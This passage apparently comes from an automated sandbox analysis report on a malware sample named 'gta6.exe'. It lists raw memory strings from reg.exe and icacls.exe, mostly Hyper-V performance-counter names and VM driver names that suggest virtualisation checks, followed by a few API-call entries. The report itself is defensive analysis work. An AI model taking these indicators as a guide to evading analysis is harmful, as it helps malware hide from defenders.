Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs
    Source: reg.exe, 00000020.00000003.1615168607.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1610991428.0000024D3578A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
    Source: icacls.exe, 0000001E.00000002.1315865422.0000024753962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ss.svmci.syswfplwfs.sys`
    Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
    Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
    Source: reg.exe, 00000020.00000003.1616205398.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611881262.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612272320.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615968093.0000024D357F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervis
    Source: reg.exe, 00000020.00000003.1593238842.0000024D350F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec487
    Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
    Source: reg.exe, 00000020.00000003.1583159282.0000024D35889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_none_40a51070cee1599d]^
    Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor;l-
    Source: reg.exe, 00000020.00000003.1594895808.0000024D35106000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594776251.0000024D350D2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594703951.0000024D3510D000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594199326.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594918365.0000024D3510B000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594293310.0000024D350F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitionui
    Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service)
    Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V jvtjinaerjcnmkc Bus"
    Source: reg.exe, 00000020.00000003.1601148051.0000024D350D1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615644990.0000024D350CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844
    Source: reg.exe, 00000020.00000003.1615327515.0000024D357C0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611343119.0000024D357C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: redictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
    Source: reg.exe, 00000020.00000003.1616146655.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615490327.0000024D3578A000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611988960.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611486893.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615758985.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611751619.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611684206.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615691839.0000024D357B1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616057154.0000024D357B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch P
    Source: reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Count
    Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4788Hyper-V Hypervisor4790Logical`
    Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V jvtjinaerjcnmkc Bus Pipes
    Source: reg.exe, 00000020.00000003.1615208152.0000024D350CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs Sent/sec5098GPA Space Hypercalls/sec5100Logical Processor Hypercall
    Source: icacls.exe, 0000001E.00000003.1309867549.0000024753958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmci.sys`
    Source: reg.exe, 00000020.00000003.1601112480.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601008694.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1600728861.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601291746.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601421314.0000024D357B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshotval.
    Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pervisorStartupCost4906Hyper-V Hyp
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014000C4D0 RtlRemoveVectoredExceptionHandler,RtlAddVectoredExceptionHandler,0_2_000000014000C4D0
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014001F888 RtlAddVectoredExceptionHandler,0_2_000000014001F888
